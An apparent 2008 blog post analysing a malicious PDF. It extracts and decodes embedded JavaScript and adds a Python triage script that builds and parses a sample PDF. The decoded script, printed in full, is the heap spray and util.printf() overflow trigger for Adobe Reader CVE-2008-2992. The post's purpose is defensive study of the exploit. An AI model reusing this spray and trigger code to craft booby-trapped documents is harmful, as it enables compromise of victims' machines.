Saturday, November 15, 2008

simple pdf exploit analysis

Simple steps for checking a PDF for an exploit:
1. Open the file in a hex viewer or any text editor/viewer. If the PDF carries an embedded script inside a compressed stream, the stream dictionary names the filter, so the string FlateDecode is the first thing to search for (the script itself is usually marked by /JS or /JavaScript, and the action that fires it by /OpenAction or /AA):
3. Use pdftk to rewrite the file with every stream uncompressed, which exposes the malicious script:

$ pdftk file.pdf output file.pdf.out uncompress

4. The file file.pdf.out now contains the decompressed streams. Search it for /JS to locate the script, which at this point is still %XX-escaped:

5. Extract the escaped text and feed it to your preferred tool to unescape it (JavaScript's own unescape(), or a one-liner in any scripting language).
Extracted text:
%76%61%72%20%73%63%63%73%20%3D%20%75%6E%65%73%63%61%70%65%28%74%68%69%73%2E%67%65%74%46%69%65%6C%64%28%27%74%65%78%74%27%29%2E%76%61%6C%75%65%29%3B%0D%0A%0D%0A%09%76%61%72%20%62%67%62%6C%20%3D%20%75%6E%65%73%63%61%70%65%28%22%25%75%30%41%30%41%22%2B%22%25%75%30%41%30%41%22%29%3B%0D%0A%09%76%61%72%20%73%6C%73%70%63%20%3D%20%32%30%20%2B%20%73%63%63%73%2E%6C%65%6E%67%74%68%3B%0D%0A%09%77%68%69%6C%65%28%62%67%62%6C%2E%6C%65%6E%67%74%68%20%3C%20%73%6C%73%70%63%29%20%62%67%62%6C%20%2B%3D%20%62%67%62%6C%3B%0D%0A%09%76%61%72%20%66%62%6C%6B%20%3D%20%62%67%62%6C%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%73%6C%73%70%63%29%3B%0D%0A%09%76%61%72%20%62%6C%6B%20%3D%20%62%67%62%6C%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%62%67%62%6C%2E%6C%65%6E%67%74%68%20%2D%20%73%6C%73%70%63%29%3B%0D%0A%09%77%68%69%6C%65%28%62%6C%6B%2E%6C%65%6E%67%74%68%20%2B%20%73%6C%73%70%63%20%3C%20%30%78%36%30%30%30%30%29%20%62%6C%6B%20%3D%20%62%6C%6B%20%2B%20%62%6C%6B%20%2B%20%66%62%6C%6B%3B%0D%0A%0D%0A%09%76%61%72%20%6D%6D%79%20%3D%20%6E%65%77%20%41%72%72%61%79%28%29%3B%0D%0A%09%66%6F%72%28%69%20%3D%20%30%3B%20%69%20%3C%20%31%32%30%30%3B%20%69%2B%2B%29%7B%20%6D%6D%79%5B%69%5D%20%3D%20%62%6C%6B%20%2B%20%73%63%63%73%20%7D%0D%0A%0D%0A%76%61%72%20%6E%6D%20%3D%20%31%32%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%31%38%3B%69%2B%2B%29%7B%20%6E%6D%20%3D%20%6E%6D%20%2B%20%22%39%22%3B%20%7D%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%32%37%36%3B%69%2B%2B%29%7B%20%6E%6D%20%3D%20%6E%6D%20%2B%20%22%38%22%3B%20%7D%0D%0A%0D%0A%75%74%69%6C%2E%70%72%69%6E%74%66%28%75%6E%65%73%63%61%70%65%28%22%22%2B%22%25%22%2B%22%32%35%25%33%34%25%22%2B%22%33%35%25%33%30%25%33%30%25%33%30%25%36%36%22%29%2C%20%6E%6D%29%3B%0D%0A%0D%0A%74%68%69%73%2E%63%6C%6F%73%65%44%6F%63%28%74%72%75%65%29%3B%0D%0A

Unescaped, the script reads as follows.
<------------------------------------------------------------------------------
var sccs = unescape(this.getField('text').value);
var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < slspc) bgbl += bgbl;
var fblk = bgbl.substring(0,slspc);
var blk = bgbl.substring(0,bgbl.length - slspc);
while(blk.length + slspc < 0x60000) blk = blk + blk + fblk;
var mmy = new Array();
for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs }
var nm = 12;
for(i=0;i<18;i++){ nm = nm + "9"; }
for(i=0;i<276;i++){ nm = nm + "8"; }
util.printf(unescape(""+"%"+"25%34%"+"35%30%30%30%66"), nm);
this.closeDoc(true);
<------------------------------------------------------------------------------

If you follow recent advisories this will look familiar: it is the Adobe Reader util.printf() buffer overflow (CVE-2008-2992) reported by Core Security. The decoded script makes the mechanics plain. The first block builds blk from repeated 0x0A0A bytes (unescape("%u0A0A")) until it is close to 0x60000 bytes, then stores 1200 copies of blk followed by sccs in the array mmy; sccs is the shellcode, read from the form field named 'text'. That is a heap spray, with 0x0A0A serving both as the slide and as the address the overwritten pointer is expected to land on. nm becomes a long numeric string (12 followed by 18 nines and 276 eights), and the inner unescape("%25%34%35%30%30%30%66") evaluates to "%45000f", so the final call is util.printf("%45000f", nm): a 45000-character floating-point field width that overflows a fixed-size buffer in Reader's printf implementation. closeDoc(true) then quietly closes the document. Details: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
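The five steps above, carried out in one script rather than by hand. This is an added example, not code from the original post or from pdftk: it builds a constructed sample PDF (the util.printf trigger from the decoded script, %XX-escaped inside a FlateDecode stream, with a simplified structure and no xref table), then does what step 1 (look for FlateDecode), step 3 (inflate the streams), step 4 (find the /JS string) and step 5 (unescape it) do. The regexes assume flat stream dictionaries and a /JS literal without parentheses, which holds for fully escaped payloads; a real parser would honour /Length and nested dictionaries. Note that JavaScript's unescape() also accepts %uXXXX, which the payload's second layer uses and urllib's unquote() does not handle.

```python
import re
import zlib

# Constructed sample input: the util.printf trigger from the decoded script,
# stored the way the post found it (every character %XX-escaped inside a
# /JS string in a FlateDecode-compressed object).  Not a real-world file.
SAMPLE_SCRIPT = (
    "var nm = 12;\r\n"
    "for(i=0;i<18;i++){ nm = nm + \"9\"; }\r\n"
    "for(i=0;i<276;i++){ nm = nm + \"8\"; }\r\n"
    "util.printf(unescape(\"\"+\"%\"+\"25%34%\"+\"35%30%30%30%66\"), nm);\r\n"
)


def js_escape(text: str) -> str:
    """%XX-escape every character (ASCII input assumed), as in the sample."""
    return "".join("%%%02X" % ord(c) for c in text)


def build_sample_pdf(script: str) -> bytes:
    """Minimal PDF whose /OpenAction points at a JavaScript action stored
    inside a FlateDecode stream.  Simplified structure (no xref table):
    enough for string-level triage, not for opening in a viewer."""
    action = ("<< /S /JavaScript /JS (%s) >>" % js_escape(script)).encode("ascii")
    data = zlib.compress(action)
    header = (
        b"%PDF-1.4\n"
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>\nendobj\n"
        b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
    )
    stream_obj = (
        b"3 0 obj\n<< /Length " + str(len(data)).encode() + b" /Filter /FlateDecode >>\n"
        b"stream\n" + data + b"\nendstream\nendobj\n"
    )
    trailer = b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
    return header + stream_obj + trailer


# Step 1: the cheap first check -- does anything in the file use FlateDecode?
def has_flate_streams(pdf: bytes) -> bool:
    return b"/FlateDecode" in pdf


# Step 3: what `pdftk ... uncompress` does for us.  Assumes a flat stream
# dictionary and takes the body up to the first "endstream".
STREAM_RE = re.compile(rb"<<((?:(?!<<|>>).)*)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)


def inflate_streams(pdf: bytes) -> list:
    blobs = []
    for m in STREAM_RE.finditer(pdf):
        dictionary, body = m.group(1), m.group(2)
        if b"/FlateDecode" not in dictionary:
            blobs.append(body)
            continue
        try:
            blobs.append(zlib.decompress(body))
        except zlib.error:
            pass  # truncated or multi-filter stream: skip it, don't abort triage
    return blobs


# Step 4: locate /JS literal strings.  Taking the literal up to the first ")"
# is fine for %XX-escaped payloads, which contain no parentheses.
JS_RE = re.compile(rb"/JS\s*\((.*?)\)", re.S)


def find_js_strings(blobs) -> list:
    found = []
    for blob in blobs:
        for m in JS_RE.finditer(blob):
            found.append(m.group(1).decode("latin-1"))
    return found


# Step 5: JavaScript's unescape(): %uXXXX is a UTF-16 code unit, %XX a byte,
# anything else is left untouched.
ESC_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(text: str) -> str:
    return ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def extract_scripts(pdf: bytes) -> list:
    """Run the whole procedure: scan the raw file and every inflated stream
    for /JS strings and return each payload unescaped."""
    blobs = [pdf] + inflate_streams(pdf)
    return [js_unescape(s) for s in find_js_strings(blobs)]


if __name__ == "__main__":
    sample = build_sample_pdf(SAMPLE_SCRIPT)
    print("FlateDecode present:", has_flate_streams(sample))
    for script in extract_scripts(sample):
        print(script)
    # The payload escapes its format string a second time; peel that layer too.
    print(js_unescape("%25%34%35%30%30%30%66"))
```

Running it prints the recovered script and then the inner format string "%45000f", the value util.printf() actually receives. Pointing extract_scripts() at a real file works the same way as long as the /JS string is a literal in a flat dictionary; anything fancier (hex strings, object streams, /JS pointing at a separate stream object) needs the fuller parser hinted at in the comments.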